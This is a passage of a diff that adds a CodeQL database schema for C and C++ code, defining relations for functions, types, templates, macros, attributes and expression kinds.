num_code: int ref, + int num_comment: int ref +); + +/*- Diagnostic messages -*/ + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +/*- C++ dbscheme -*/ + +extractor_version( + string codeql_version: string ref, + string frontend_version: string ref +) + +/** + * Gives the TRAP filename that `trap` is associated with. + * For debugging only. + */ +trap_filename( + int trap: @trap, + string filename: string ref +); + +/** + * Gives the tag name for `tag`. + * For debugging only. + */ +tag_name( + int tag: @tag, + string name: string ref +); + +@trap_or_tag = @tag | @trap; + +/** + * Gives the name for the source file. + */ +source_file_name( + int sf: @source_file, + string name: string ref +); + +/** + * In `build-mode: none` overlay mode, indicates that `source_file` + * (`/path/to/foo.c`) uses the TRAP file `trap_file`; i.e. it is the + * TRAP file corresponding to `foo.c`, something it transitively + * includes, or a template instantiation it transitively uses. + */ +source_file_uses_trap( + int source_file: @source_file ref, + int trap_file: @trap ref +); + +/** + * In `build-mode: none` overlay mode, indicates that the TRAP file + * `trap_file` uses tag `tag`. + */ +trap_uses_tag( + int trap_file: @trap ref, + int tag: @tag ref +); + +/** + * Holds if there is a definition of `element` in TRAP file or tag `t`. + */ +in_trap_or_tag( + int element: @element ref, + int t: @trap_or_tag ref +); + +pch_uses( + int pch: @pch ref, + int compilation: @compilation ref, + int id: @file ref +) + +#keyset[pch, compilation] +pch_creations( + int pch: @pch, + int compilation: @compilation ref, + int from: @file ref +) + +/** An element for which line-count information is available. */ +@sourceline = @file | @function | @variable | @enumconstant | @xmllocatable; + +fileannotations( + int id: @file ref, + int kind: int ref, + string name: string ref, + string value: string ref +); + +inmacroexpansion( + int id: @element ref, + int inv: @macroinvocation ref +); + +affectedbymacroexpansion( + int id: @element ref, + int inv: @macroinvocation ref +); + +case @macroinvocation.kind of + 1 = @macro_expansion +| 2 = @other_macro_reference +; + +macroinvocations( + unique int id: @macroinvocation, + int macro_id: @ppd_define ref, + int location: @location_default ref, + int kind: int ref +); + +macroparent( + unique int id: @macroinvocation ref, + int parent_id: @macroinvocation ref +); + +// a macroinvocation may be part of another location +// the way to find a constant expression that uses a macro +// is thus to find a constant expression that has a location +// to which a macro invocation is bound +macrolocationbind( + int id: @macroinvocation ref, + int location: @location_default ref +); + +#keyset[invocation, argument_index] +macro_argument_unexpanded( + int invocation: @macroinvocation ref, + int argument_index: int ref, + string text: string ref +); + +#keyset[invocation, argument_index] +macro_argument_expanded( + int invocation: @macroinvocation ref, + int argument_index: int ref, + string text: string ref +); + +case @function.kind of + 0 = @unknown_function +| 1 = @normal_function +| 2 = @constructor +| 3 = @destructor +| 4 = @conversion_function +| 5 = @operator +// ... 6 = @builtin_function deprecated // GCC built-in functions, e.g. __builtin___memcpy_chk +| 7 = @user_defined_literal +| 8 = @deduction_guide +; + +functions( + unique int id: @function, + string name: string ref, + int kind: int ref +); + +builtin_functions( + int id: @function ref +) + +function_entry_point( + int id: @function ref, + unique int entry_point: @stmt ref +); + +function_return_type( + int id: @function ref, + int return_type: @type ref +); + +/** + * If `function` is a coroutine, then this gives the `std::experimental::resumable_traits` + * instance associated with it, and the variables representing the `handle` and `promise` + * for it. + */ +coroutine( + unique int function: @function ref, + int traits: @type ref +); + +/* +case @coroutine_placeholder_variable.kind of + 1 = @handle +| 2 = @promise +| 3 = @init_await_resume +; +*/ + +coroutine_placeholder_variable( + unique int placeholder_variable: @variable ref, + int kind: int ref, + int function: @function ref +) + +/** The `new` function used for allocating the coroutine state, if any. */ +coroutine_new( + unique int function: @function ref, + int new: @function ref +); + +/** The `delete` function used for deallocating the coroutine state, if any. */ +coroutine_delete( + unique int function: @function ref, + int delete: @function ref +); + +purefunctions(unique int id: @function ref); + +function_deleted(unique int id: @function ref); + +function_defaulted(unique int id: @function ref); + +function_prototyped(unique int id: @function ref) + +deduction_guide_for_class( + int id: @function ref, + int class_template: @usertype ref +) + +member_function_this_type( + unique int id: @function ref, + int this_type: @type ref +); + +#keyset[id, type_id] +fun_decls( + int id: @fun_decl, + int function: @function ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); +fun_def(unique int id: @fun_decl ref); +fun_specialized(unique int id: @fun_decl ref); +fun_implicit(unique int id: @fun_decl ref); +fun_decl_specifiers( + int id: @fun_decl ref, + string name: string ref +) +#keyset[fun_decl, index] +fun_decl_throws( + int fun_decl: @fun_decl ref, + int index: int ref, + int type_id: @type ref +); +/* an empty throw specification is different from none */ +fun_decl_empty_throws(unique int fun_decl: @fun_decl ref); +fun_decl_noexcept( + int fun_decl: @fun_decl ref, + int constant: @expr ref +); +fun_decl_empty_noexcept(int fun_decl: @fun_decl ref); +fun_decl_typedef_type( + unique int fun_decl: @fun_decl ref, + int typedeftype_id: @usertype ref +); + +/* +case @fun_requires.kind of + 1 = @template_attached +| 2 = @function_attached +; +*/ + +fun_requires( + int id: @fun_decl ref, + int kind: int ref, + int constraint: @expr ref +); + +param_decl_bind( + unique int id: @var_decl ref, + int index: int ref, + int fun_decl: @fun_decl ref +); + +#keyset[id, type_id] +var_decls( + int id: @var_decl, + int variable: @variable ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); +var_def(unique int id: @var_decl ref); +var_specialized(int id: @var_decl ref); +var_decl_specifiers( + int id: @var_decl ref, + string name: string ref +) +is_structured_binding(unique int id: @variable ref); +var_requires( + int id: @var_decl ref, + int constraint: @expr ref +); + +type_decls( + unique int id: @type_decl, + int type_id: @type ref, + int location: @location_default ref +); +type_def(unique int id: @type_decl ref); +type_decl_top( + unique int type_decl: @type_decl ref +); +type_requires( + int id: @type_decl ref, + int constraint: @expr ref +); + +namespace_decls( + unique int id: @namespace_decl, + int namespace_id: @namespace ref, + int location: @location_default ref, + int bodylocation: @location_default ref +); + +case @using.kind of + 1 = @using_declaration +| 2 = @using_directive +| 3 = @using_enum_declaration +; + +usings( + unique int id: @using, + int element_id: @element ref, + int location: @location_default ref, + int kind: int ref +); + +/** The element which contains the `using` declaration. */ +using_container( + int parent: @element ref, + int child: @using ref +); + +static_asserts( + unique int id: @static_assert, + int condition : @expr ref, + string message : string ref, + int location: @location_default ref, + int enclosing : @element ref +); + +// each function has an ordered list of parameters +#keyset[id, type_id] +#keyset[function, index, type_id] +params( + int id: @parameter, + int function: @parameterized_element ref, + int index: int ref, + int type_id: @type ref +); + +overrides( + int new: @function ref, + int old: @function ref +); + +#keyset[id, type_id] +membervariables( + int id: @membervariable, + int type_id: @type ref, + string name: string ref +); + +#keyset[id, type_id] +globalvariables( + int id: @globalvariable, + int type_id: @type ref, + string name: string ref +); + +#keyset[id, type_id] +localvariables( + int id: @localvariable, + int type_id: @type ref, + string name: string ref +); + +autoderivation( + unique int var: @variable ref, + int derivation_type: @type ref +); + +orphaned_variables( + int var: @localvariable ref, + int function: @function ref +) + +enumconstants( + unique int id: @enumconstant, + int parent: @usertype ref, + int index: int ref, + int type_id: @type ref, + string name: string ref, + int location: @location_default ref +); + +@variable = @localscopevariable | @globalvariable | @membervariable; + +@localscopevariable = @localvariable | @parameter; + +/** + * Built-in types are the fundamental types, e.g., integral, floating, and void. + */ +case @builtintype.kind of + 1 = @errortype +| 2 = @unknowntype +| 3 = @void +| 4 = @boolean +| 5 = @char +| 6 = @unsigned_char +| 7 = @signed_char +| 8 = @short +| 9 = @unsigned_short +| 10 = @signed_short +| 11 = @int +| 12 = @unsigned_int +| 13 = @signed_int +| 14 = @long +| 15 = @unsigned_long +| 16 = @signed_long +| 17 = @long_long +| 18 = @unsigned_long_long +| 19 = @signed_long_long +// ... 20 Microsoft-specific __int8 +// ... 21 Microsoft-specific __int16 +// ... 22 Microsoft-specific __int32 +// ... 23 Microsoft-specific __int64 +| 24 = @float +| 25 = @double +| 26 = @long_double +| 27 = @complex_float // C99-specific _Complex float +| 28 = @complex_double // C99-specific _Complex double +| 29 = @complex_long_double // C99-specific _Complex long double +| 30 = @imaginary_float // C99-specific _Imaginary float +| 31 = @imaginary_double // C99-specific _Imaginary double +| 32 = @imaginary_long_double // C99-specific _Imaginary long double +| 33 = @wchar_t // Microsoft-specific +| 34 = @decltype_nullptr // C++11 +| 35 = @int128 // __int128 +| 36 = @unsigned_int128 // unsigned __int128 +| 37 = @signed_int128 // signed __int128 +| 38 = @float128 // __float128 +| 39 = @complex_float128 // _Complex __float128 +// ... 40 _Decimal32 +// ... 41 _Decimal64 +// ... 42 _Decimal128 +| 43 = @char16_t +| 44 = @char32_t +| 45 = @std_float32 // _Float32 +| 46 = @float32x // _Float32x +| 47 = @std_float64 // _Float64 +| 48 = @float64x // _Float64x +| 49 = @std_float128 // _Float128 +// ... 50 _Float128x +| 51 = @char8_t +| 52 = @float16 // _Float16 +| 53 = @complex_float16 // _Complex _Float16 +| 54 = @fp16 // __fp16 +| 55 = @std_bfloat16 // __bf16 +| 56 = @std_float16 // std::float16_t +| 57 = @complex_std_float32 // _Complex _Float32 +| 58 = @complex_float32x // _Complex _Float32x +| 59 = @complex_std_float64 // _Complex _Float64 +| 60 = @complex_float64x // _Complex _Float64x +| 61 = @complex_std_float128 // _Complex _Float128 +| 62 = @mfp8 // __mfp8 +| 63 = @scalable_vector_count // __SVCount_t +| 64 = @complex_fp16 // _Complex __fp16 +| 65 = @complex_std_bfloat16 // _Complex __bf16 +| 66 = @complex_std_float16 // _Complex std::float16_t +; + +builtintypes( + unique int id: @builtintype, + string name: string ref, + int kind: int ref, + int size: int ref, + int sign: int ref, + int alignment: int ref +); + +/** + * Derived types are types that are directly derived from existing types and + * point to, refer to, transform type data to return a new type. + */ +case @derivedtype.kind of + 1 = @pointer +| 2 = @reference +| 3 = @type_with_specifiers +| 4 = @array +| 5 = @gnu_vector +| 6 = @routineptr +| 7 = @routinereference +| 8 = @rvalue_reference // C++11 +// ... 9 type_conforming_to_protocols deprecated +| 10 = @block +| 11 = @scalable_vector // Arm SVE +; + +derivedtypes( + unique int id: @derivedtype, + string name: string ref, + int kind: int ref, + int type_id: @type ref +); + +pointerishsize(unique int id: @derivedtype ref, + int size: int ref, + int alignment: int ref); + +arraysizes( + unique int id: @derivedtype ref, + int num_elements: int ref, + int bytesize: int ref, + int alignment: int ref +); + +tupleelements( + unique int id: @derivedtype ref, + int num_elements: int ref +); + +typedefbase( + unique int id: @usertype ref, + int type_id: @type ref +); + +/** + * An instance of the C++11 `decltype` operator or C23 `typeof`/`typeof_unqual` + * operator taking an expression as its argument. For example: + * ``` + * int a; + * decltype(1+a) b; + * typeof(1+a) c; + * ``` + * Here `expr` is `1+a`. + * + * Sometimes an additional pair of parentheses around the expression + * changes the semantics of the decltype, e.g. + * ``` + * struct A { double x; }; + * const A* a = new A(); + * decltype( a->x ); // type is double + * decltype((a->x)); // type is const double& + * ``` + * (Please consult the C++11 standard for more details). + * `parentheses_would_change_meaning` is `true` iff that is the case. + */ + +/* +case @decltype.kind of +| 0 = @decltype +| 1 = @typeof // The frontend does not differentiate between typeof and typeof_unqual +; +*/ + +#keyset[id, expr] +decltypes( + int id: @decltype, + int expr: @expr ref, + int kind: int ref, + int base_type: @type ref, + boolean parentheses_would_change_meaning: boolean ref +); + +case @type_operator.kind of + 0 = @typeof // The frontend does not differentiate between typeof and typeof_unqual +| 1 = @underlying_type +| 2 = @bases +| 3 = @direct_bases +| 4 = @add_lvalue_reference +| 5 = @add_pointer +| 6 = @add_rvalue_reference +| 7 = @decay +| 8 = @make_signed +| 9 = @make_unsigned +| 10 = @remove_all_extents +| 11 = @remove_const +| 12 = @remove_cv +| 13 = @remove_cvref +| 14 = @remove_extent +| 15 = @remove_pointer +| 16 = @remove_reference_t +| 17 = @remove_restrict +| 18 = @remove_volatile +| 19 = @remove_reference +; + +type_operators( + unique int id: @type_operator, + int arg_type: @type ref, + int kind: int ref, + int base_type: @type ref +) + +case @usertype.kind of + 0 = @unknown_usertype +| 1 = @struct +| 2 = @class +| 3 = @union +| 4 = @enum +// ... 5 = @typedef deprecated // classic C: typedef typedef type name +// ... 6 = @template deprecated +| 7 = @template_parameter +| 8 = @template_template_parameter +| 9 = @proxy_class // a proxy class associated with a template parameter +// ... 10 objc_class deprecated +// ... 11 objc_protocol deprecated +// ... 12 objc_category deprecated +| 13 = @scoped_enum +// ... 14 = @using_alias deprecated // a using name = type style typedef +| 15 = @template_struct +| 16 = @template_class +| 17 = @template_union +| 18 = @alias +; + +usertypes( + unique int id: @usertype, + string name: string ref, + int kind: int ref +); + +usertypesize( + unique int id: @usertype ref, + int size: int ref, + int alignment: int ref +); + +usertype_final(unique int id: @usertype ref); + +usertype_uuid( + unique int id: @usertype ref, + string uuid: string ref +); + +/* +case @usertype.alias_kind of +| 0 = @typedef +| 1 = @alias +*/ + +usertype_alias_kind( + int id: @usertype ref, + int alias_kind: int ref +) + +nontype_template_parameters( + int id: @expr ref +); + +type_template_type_constraint( + int id: @usertype ref, + int constraint: @expr ref +); + +mangled_name( + unique int id: @declaration ref, + int mangled_name : @mangledname, + boolean is_complete: boolean ref +); + +is_pod_class(unique int id: @usertype ref); +is_standard_layout_class(unique int id: @usertype ref); + +is_complete(unique int id: @usertype ref); + +is_class_template(unique int id: @usertype ref); +class_instantiation( + int to: @usertype ref, + int from: @usertype ref +); +class_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +class_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); +class_template_generated_from( + unique int template: @usertype ref, + int from: @usertype ref +) + +@user_or_decltype = @usertype | @decltype; + +is_proxy_class_for( + unique int id: @usertype ref, + int templ_param_id: @user_or_decltype ref +); + +type_mentions( + unique int id: @type_mention, + int type_id: @type ref, + int location: @location_default ref, + // a_symbol_reference_kind from the frontend. + int kind: int ref +); + +is_function_template(unique int id: @function ref); +function_instantiation( + unique int to: @function ref, + int from: @function ref +); +function_template_argument( + int function_id: @function ref, + int index: int ref, + int arg_type: @type ref +); +function_template_argument_value( + int function_id: @function ref, + int index: int ref, + int arg_value: @expr ref +); +function_template_generated_from( + unique int template: @function ref, + int from: @function ref +); + +is_variable_template(unique int id: @variable ref); +variable_instantiation( + unique int to: @variable ref, + int from: @variable ref +); +variable_template_argument( + int variable_id: @variable ref, + int index: int ref, + int arg_type: @type ref +); +variable_template_argument_value( + int variable_id: @variable ref, + int index: int ref, + int arg_value: @expr ref +); +variable_template_generated_from( + unique int template: @variable ref, + int from: @variable ref +); + +is_alias_template(unique int id: @usertype ref); +alias_instantiation( + unique int to: @usertype ref, + int from: @usertype ref +); +alias_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +alias_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); +alias_template_generated_from( + unique int template: @usertype ref, + int from: @usertype ref +); + +template_template_instantiation( + int to: @usertype ref, + int from: @usertype ref +); +template_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +template_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); + +@concept = @concept_template | @concept_id; + +concept_templates( + unique int concept_id: @concept_template, + string name: string ref, + int location: @location_default ref +); +concept_instantiation( + unique int to: @concept_id ref, + int from: @concept_template ref +); +is_type_constraint(int concept_id: @concept_id ref); +concept_template_argument( + int concept_id: @concept ref, + int index: int ref, + int arg_type: @type ref +); +concept_template_argument_value( + int concept_id: @concept ref, + int index: int ref, + int arg_value: @expr ref +); + +routinetypes( + unique int id: @routinetype, + int return_type: @type ref +); + +routinetypeargs( + int routine: @routinetype ref, + int index: int ref, + int type_id: @type ref +); + +ptrtomembers( + unique int id: @ptrtomember, + int type_id: @type ref, + int class_id: @type ref +); + +/* + specifiers for types, functions, and variables + + "public", + "protected", + "private", + + "const", + "volatile", + "static", + + "pure", + "virtual", + "sealed", // Microsoft + "__interface", // Microsoft + "inline", + "explicit", + + "near", // near far extension + "far", // near far extension + "__ptr32", // Microsoft + "__ptr64", // Microsoft + "__sptr", // Microsoft + "__uptr", // Microsoft + "dllimport", // Microsoft + "dllexport", // Microsoft + "thread", // Microsoft + "naked", // Microsoft + "microsoft_inline", // Microsoft + "forceinline", // Microsoft + "selectany", // Microsoft + "nothrow", // Microsoft + "novtable", // Microsoft + "noreturn", // Microsoft + "noinline", // Microsoft + "noalias", // Microsoft + "restrict", // Microsoft +*/ + +specifiers( + unique int id: @specifier, + unique string str: string ref +); + +typespecifiers( + int type_id: @type ref, + int spec_id: @specifier ref +); + +funspecifiers( + int func_id: @function ref, + int spec_id: @specifier ref +); + +varspecifiers( + int var_id: @accessible ref, + int spec_id: @specifier ref +); + +explicit_specifier_exprs( + unique int func_id: @function ref, + int constant: @expr ref +) + +attributes( + unique int id: @attribute, + int kind: int ref, + string name: string ref, + string name_space: string ref, + int location: @location_default ref +); + +case @attribute.kind of + 0 = @gnuattribute +| 1 = @stdattribute +| 2 = @declspec +| 3 = @msattribute +| 4 = @alignas +// ... 5 @objc_propertyattribute deprecated +; + +attribute_args( + unique int id: @attribute_arg, + int kind: int ref, + int attribute: @attribute ref, + int index: int ref, + int location: @location_default ref +); + +case @attribute_arg.kind of + 0 = @attribute_arg_empty +| 1 = @attribute_arg_token +| 2 = @attribute_arg_constant +| 3 = @attribute_arg_type +| 4 = @attribute_arg_constant_expr +| 5 = @attribute_arg_expr +; + +attribute_arg_value( + unique int arg: @attribute_arg ref, + string value: string ref +); +attribute_arg_type( + unique int arg: @attribute_arg ref, + int type_id: @type ref +); +attribute_arg_constant( + unique int arg: @attribute_arg ref, + int constant: @expr ref +) +attribute_arg_expr( + unique int arg: @attribute_arg ref, + int expr: @expr ref +) +attribute_arg_name( + unique int arg: @attribute_arg ref, + string name: string ref +); + +typeattributes( + int type_id: @type ref, + int spec_id: @attribute ref +); + +funcattributes( + int func_id: @function ref, + int spec_id: @attribute ref +); + +varattributes( + int var_id: @accessible ref, + int spec_id: @attribute ref +); + +namespaceattributes( + int namespace_id: @namespace ref, + int spec_id: @attribute ref +); + +stmtattributes( + int stmt_id: @stmt ref, + int spec_id: @attribute ref +); + +@type = @builtintype + | @derivedtype + | @usertype + | @routinetype + | @ptrtomember + | @decltype + | @type_operator; + +unspecifiedtype( + unique int type_id: @type ref, + int unspecified_type_id: @type ref +); + +member( + int parent: @type ref, + int index: int ref, + int child: @member ref +); + +@enclosingfunction_child = @usertype | @variable | @namespace + +enclosingfunction( + unique int child: @enclosingfunction_child ref, + int parent: @function ref +); + +derivations( + unique int derivation: @derivation, + int sub: @type ref, + int index: int ref, + int super: @type ref, + int location: @location_default ref +); + +derspecifiers( + int der_id: @derivation ref, + int spec_id: @specifier ref +); + +/** + * Contains the byte offset of the base class subobject within the derived + * class. Only holds for non-virtual base classes, but see table + * `virtual_base_offsets` for offsets of virtual base class subobjects. + */ +direct_base_offsets( + unique int der_id: @derivation ref, + int offset: int ref +); + +/** + * Contains the byte offset of the virtual base class subobject for class + * `super` within a most-derived object of class `sub`. `super` can be either a + * direct or indirect base class. + */ +#keyset[sub, super] +virtual_base_offsets( + int sub: @usertype ref, + int super: @usertype ref, + int offset: int ref +); + +frienddecls( + unique int id: @frienddecl, + int type_id: @type ref, + int decl_id: @declaration ref, + int location: @location_default ref +); + +@declaredtype = @usertype ; + +@declaration = @function + | @declaredtype + | @variable + | @enumconstant + | @frienddecl + | @concept_template; + +@member = @membervariable + | @function + | @declaredtype + | @enumconstant; + +@locatable = @diagnostic + | @declaration + | @ppd_include + | @ppd_define + | @macroinvocation + /*| @funcall*/ + | @xmllocatable + | @attribute + | @attribute_arg; + +@namedscope = @namespace | @usertype; + +@element = @locatable + | @file + | @folder + | @specifier + | @type + | @expr + | @namespace + | @initialiser + | @stmt + | @derivation + | @comment + | @preprocdirect + | @fun_decl + | @var_decl + | @type_decl + | @namespace_decl + | @using + | @namequalifier + | @specialnamequalifyingelement + | @static_assert + | @type_mention + | @lambdacapture; + +@exprparent = @element; + +comments( + unique int id: @comment, + string contents: string ref, + int location: @location_default ref +); + +commentbinding( + int id: @comment ref, + int element: @element ref +); + +exprconv( + int converted: @expr ref, + unique int conversion: @expr ref +); + +compgenerated(unique int id: @element ref); + +/** + * `destructor_call` destructs the `i`'th entity that should be + * destructed following `element`. Note that entities should be + * destructed in reverse construction order, so for a given `element` + * these should be called from highest to lowest `i`. + */ +#keyset[element, destructor_call] +#keyset[element, i] +synthetic_destructor_call( + int element: @element ref, + int i: int ref, + int destructor_call: @routineexpr ref +); + +namespaces( + unique int id: @namespace, + string name: string ref +); + +namespace_inline( + unique int id: @namespace ref +); + +namespacembrs( + int parentid: @namespace ref, + unique int memberid: @namespacembr ref +); + +@namespacembr = @declaration | @namespace; + +exprparents( + int expr_id: @expr ref, + int child_index: int ref, + int parent_id: @exprparent ref +); + +expr_isload(unique int expr_id: @expr ref); + +@cast = @c_style_cast + | @const_cast + | @dynamic_cast + | @reinterpret_cast + | @static_cast + ; + +/* +case @conversion.kind of + 0 = @simple_conversion // a numeric conversion, qualification conversion, or a reinterpret_cast +| 1 = @bool_conversion // conversion to 'bool' +| 2 = @base_class_conversion // a derived-to-base conversion +| 3 = @derived_class_conversion // a base-to-derived conversion +| 4 = @pm_base_class_conversion // a derived-to-base conversion of a pointer to member +| 5 = @pm_derived_class_conversion // a base-to-derived conversion of a pointer to member +| 6 = @glvalue_adjust // an adjustment of the type of a glvalue +| 7 = @prvalue_adjust // an adjustment of the type of a prvalue +; +*/ +/** + * Describes the semantics represented by a cast expression. This is largely + * independent of the source syntax of the cast, so it is separate from the + * regular expression kind. + */ +conversionkinds( + unique int expr_id: @cast ref, + int kind: int ref +); + +@conversion = @cast + | @array_to_pointer + | @parexpr + | @reference_to + | @ref_indirect + | @temp_init + | @c11_generic + ; + +/* +case @funbindexpr.kind of + 0 = @normal_call // a normal call +| 1 = @virtual_call // a virtual call +| 2 = @adl_call // a call whose target is only found by ADL +; +*/ +iscall( + unique int caller: @funbindexpr ref, + int kind: int ref +); + +numtemplatearguments( + unique int expr_id: @expr ref, + int num: int ref +); + +specialnamequalifyingelements( + unique int id: @specialnamequalifyingelement, + unique string name: string ref +); + +@namequalifiableelement = @expr | @namequalifier; +@namequalifyingelement = @namespace + | @specialnamequalifyingelement + | @usertype + | @decltype; + +namequalifiers( + unique int id: @namequalifier, + unique int qualifiableelement: @namequalifiableelement ref, + int qualifyingelement: @namequalifyingelement ref, + int location: @location_default ref +); + +varbind( + int expr: @varbindexpr ref, + int var: @accessible ref +); + +funbind( + int expr: @funbindexpr ref, + int fun: @function ref +); + +@any_new_expr = @new_expr + | @new_array_expr; + +@new_or_delete_expr = @any_new_expr + | @delete_expr + | @delete_array_expr; + +@prefix_crement_expr = @preincrexpr | @predecrexpr; + +@postfix_crement_expr = @postincrexpr | @postdecrexpr; + +@increment_expr = @preincrexpr | @postincrexpr; + +@decrement_expr = @predecrexpr | @postdecrexpr; + +@crement_expr = @increment_expr | @decrement_expr; + +@un_arith_op_expr = @arithnegexpr + | @unaryplusexpr + | @conjugation + | @realpartexpr + | @imagpartexpr + | @crement_expr + ; + +@un_bitwise_op_expr = @complementexpr; + +@un_log_op_expr = @notexpr; + +@un_op_expr = @address_of + | @indirect + | @un_arith_op_expr + | @un_bitwise_op_expr + | @builtinaddressof + | @vec_fill + | @un_log_op_expr + | @co_await + | @co_yield + ; + +@bin_log_op_expr = @andlogicalexpr | @orlogicalexpr; + +@cmp_op_expr = @eq_op_expr | @rel_op_expr; + +@eq_op_expr = @eqexpr | @neexpr; + +@rel_op_expr = @gtexpr + | @ltexpr + | @geexpr + | @leexpr + | @spaceshipexpr + ; + +@bin_bitwise_op_expr = @lshiftexpr + | @rshiftexpr + | @andexpr + | @orexpr + | @xorexpr + ; + +@p_arith_op_expr = @paddexpr + | @psubexpr + | @pdiffexpr + ; + +@bin_arith_op_expr = @addexpr + | @subexpr + | @mulexpr + | @divexpr + | @remexpr + | @jmulexpr + | @jdivexpr + | @fjaddexpr + | @jfaddexpr + | @fjsubexpr + | @jfsubexpr + | @minexpr + | @maxexpr + | @p_arith_op_expr + ; + +@bin_op_expr = @bin_arith_op_expr + | @bin_bitwise_op_expr + | @cmp_op_expr + | @bin_log_op_expr + ; + +@op_expr = @un_op_expr + | @bin_op_expr + | @assign_expr + | @conditionalexpr + ; + +@assign_arith_expr = @assignaddexpr + | @assignsubexpr + | @assignmulexpr + | @assigndivexpr + | @assignremexpr + ; + +@assign_bitwise_expr = @assignandexpr + | @assignorexpr + | @assignxorexpr + | @assignlshiftexpr + | @assignrshiftexpr + ; + +@assign_pointer_expr = @assignpaddexpr + | @assignpsubexpr + ; + +@assign_op_expr = @assign_arith_expr + | @assign_bitwise_expr + | @assign_pointer_expr + ; + +@assign_expr = @assignexpr | @assign_op_expr | @blockassignexpr + +/* + Binary encoding of the allocator form. + + case @allocator.form of + 0 = plain + | 1 = alignment + ; +*/ + +/** + * The allocator function associated with a `new` or `new[]` expression. + * The `form` column specified whether the allocation call contains an alignment + * argument. + */ +expr_allocator( + unique int expr: @any_new_expr ref, + int func: @function ref, + int form: int ref +); + +/* + Binary encoding of the deallocator form. + + case @deallocator.form of + 0 = plain + | 1 = size + | 2 = alignment + | 4 = destroying_delete + ; +*/ + +/** + * The deallocator function associated with a `delete`, `delete[]`, `new`, or + * `new[]` expression. For a `new` or `new[]` expression, the deallocator is the + * one used to free memory if the initialization throws an exception. + * The `form` column specifies whether the deallocation call contains a size + * argument, and alignment argument, or both. + */ +expr_deallocator( + unique int expr: @new_or_delete_expr ref, + int func: @function ref, + int form: int ref +); + +/** + * Holds if the `@conditionalexpr` is of the two operand form + * `guard ? : false`. + */ +expr_cond_two_operand( + unique int cond: @conditionalexpr ref +); + +/** + * The guard of `@conditionalexpr` `guard ? true : false` + */ +expr_cond_guard( + unique int cond: @conditionalexpr ref, + int guard: @expr ref +); + +/** + * The expression used when the guard of `@conditionalexpr` + * `guard ? true : false` holds. For the two operand form + * `guard ?: false` consider using `expr_cond_guard` instead. + */ +expr_cond_true( + unique int cond: @conditionalexpr ref, + int true: @expr ref +); + +/** + * The expression used when the guard of `@conditionalexpr` + * `guard ? true : false` does not hold. + */ +expr_cond_false( + unique int cond: @conditionalexpr ref, + int false: @expr ref +); + +/** A string representation of the value. */ +values( + unique int id: @value, + string str: string ref +); + +/** The actual text in the source code for the value, if any. */ +valuetext( + unique int id: @value ref, + string text: string ref +); + +valuebind( + int val: @value ref, + unique int expr: @expr ref +); + +fieldoffsets( + unique int id: @variable ref, + int byteoffset: int ref, + int bitoffset: int ref +); + +bitfield( + unique int id: @variable ref, + int bits: int ref, + int declared_bits: int ref +); + +/* TODO +memberprefix( + int member: @expr ref, + int prefix: @expr ref +); +*/ + +/* + kind(1) = mbrcallexpr + kind(2) = mbrptrcallexpr + kind(3) = mbrptrmbrcallexpr + kind(4) = ptrmbrptrmbrcallexpr + kind(5) = mbrreadexpr // x.y + kind(6) = mbrptrreadexpr // p->y + kind(7) = mbrptrmbrreadexpr // x.*pm + kind(8) = mbrptrmbrptrreadexpr // x->*pm + kind(9) = staticmbrreadexpr // static x.y + kind(10) = staticmbrptrreadexpr // static p->y +*/ +/* TODO +memberaccess( + int member: @expr ref, + int kind: int ref +); +*/ + +initialisers( + unique int init: @initialiser, + int var: @accessible ref, + unique int expr: @expr ref, + int location: @location_default ref +); + +braced_initialisers( + int init: @initialiser ref +); + +/** + * An ancestor for the expression, for cases in which we cannot + * otherwise find the expression's parent. + */ +expr_ancestor( + int exp: @expr ref, + int ancestor: @element ref +); + +exprs( + unique int id: @expr, + int kind: int ref, + int location: @location_default ref +); + +expr_reuse( + int reuse: @expr ref, + int original: @expr ref, + int value_category: int ref +) + +/* + case @value.category of + 1 = prval + | 2 = xval + | 3 = lval + ; +*/ +expr_types( + int id: @expr ref, + int typeid: @type ref, + int value_category: int ref +); + +case @expr.kind of + 1 = @errorexpr +| 2 = @address_of // & AddressOfExpr +| 3 = @reference_to // ReferenceToExpr (implicit?) +| 4 = @indirect // * PointerDereferenceExpr +| 5 = @ref_indirect // ReferenceDereferenceExpr (implicit?) +// ... +| 8 = @array_to_pointer // (???) +| 9 = @vacuous_destructor_call // VacuousDestructorCall +// ... +| 11 = @assume // Microsoft +| 12 = @parexpr +| 13 = @arithnegexpr +| 14 = @unaryplusexpr +| 15 = @complementexpr +| 16 = @notexpr +| 17 = @conjugation // GNU ~ operator +| 18 = @realpartexpr // GNU __real +| 19 = @imagpartexpr // GNU __imag +| 20 = @postincrexpr +| 21 = @postdecrexpr +| 22 = @preincrexpr +| 23 = @predecrexpr +| 24 = @conditionalexpr +| 25 = @addexpr +| 26 = @subexpr +| 27 = @mulexpr +| 28 = @divexpr +| 29 = @remexpr +| 30 = @jmulexpr // C99 mul imaginary +| 31 = @jdivexpr // C99 div imaginary +| 32 = @fjaddexpr // C99 add real + imaginary +| 33 = @jfaddexpr // C99 add imaginary + real +| 34 = @fjsubexpr // C99 sub real - imaginary +| 35 = @jfsubexpr // C99 sub imaginary - real +| 36 = @paddexpr // pointer add (pointer + int or int + pointer) +| 37 = @psubexpr // pointer sub (pointer - integer) +| 38 = @pdiffexpr // difference between two pointers +| 39 = @lshiftexpr +| 40 = @rshiftexpr +| 41 = @andexpr +| 42 = @orexpr +| 43 = @xorexpr +| 44 = @eqexpr +| 45 = @neexpr +| 46 = @gtexpr +| 47 = @ltexpr +| 48 = @geexpr +| 49 = @leexpr +| 50 = @minexpr // GNU minimum +| 51 = @maxexpr // GNU maximum +| 52 = @assignexpr +| 53 = @assignaddexpr +| 54 = @assignsubexpr +| 55 = @assignmulexpr +| 56 = @assigndivexpr +| 57 = @assignremexpr +| 58 = @assignlshiftexpr +| 59 = @assignrshiftexpr +| 60 = @assignandexpr +| 61 = @assignorexpr +| 62 = @assignxorexpr +| 63 = 